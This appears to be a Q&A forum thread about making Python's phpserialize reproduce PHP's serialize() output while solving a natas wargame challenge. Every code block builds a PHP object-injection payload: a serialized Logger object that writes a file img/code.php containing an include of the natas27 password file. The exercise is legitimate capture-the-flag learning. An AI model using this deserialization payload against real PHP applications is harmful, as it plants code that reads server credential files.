# Python phpserialize unexpected behaviour

Tags: php, python, serialization

Whilst trying to do a *natas* challange online, I wanted to convert the php code into python, but I do not get the expected result. Might be that I'm missing something from `phpserialize`

Why is it giving a different output?

## Python code

```
import base64
from phpserialize import serialize

payload = {'initMsg': "", 'exitMsg': "<?php include('/etc/natas_webpass/natas27');?>", 'logFile': "img/code.php"}
new_ser = base64.encodestring(serialize(payload))
print(new_ser)
```

## PHP code

```
<?php
class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct(){
            $this->initMsg = "";
            $this->exitMsg = "<?php include('/etc/natas_webpass/natas27');?>";
            $this->logFile = "img/code.php";
        }                       
    }

$obj = new Logger();
echo base64_encode(serialize($obj));
?>
```

The PHP code yields: `Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=`

The python code yields:

```
b'YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1\nZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoi\naW1nL2NvZGUucGhwIjt9\n'
```

Comment: Consider the mentioned notes in the doc: https://pypi.python.org/pypi/phpserialize#object-serialization

Answer (score 1):

You are serializing a hash in the python version, and an object in the PHP one.Just turn the object into a hash (associative array), and it should yield the same result:

```
<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>
```

Comment: Would this work the other way around too? I need to convert the Python code to an object to make it work?

Comment: @Ludisposed yup you need to define a class in python with the same properties

Answer (score 0):

After reviewing the docs, I came up with a solution to convert the data to an object first and make serialize it afterwards.

*@Maxim made the PHP code like python,*

**The below code makes the Python code like PHP**

It feels like a tough way to do this, unsure if this could be made simpler.

```
class Logger():
    def __init__(self,initMsg,exitMsg,logFile):
        self.initMsg = initMsg
        self.exitMsg = exitMsg
        self.logFile = logFile

def object_hook(obj):
    if isinstance(obj, Logger):
        return phpobject('Logger', {b'\x00Logger\x00initMsg': obj.initMsg, b'\x00Logger\x00exitMsg': obj.exitMsg, b'\x00Logger\x00logFile': obj.logFile})

logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")    
new_ser = base64.encodestring(serialize(logger, object_hook=object_hook)).replace(b'\n', b'').decode('ascii')
```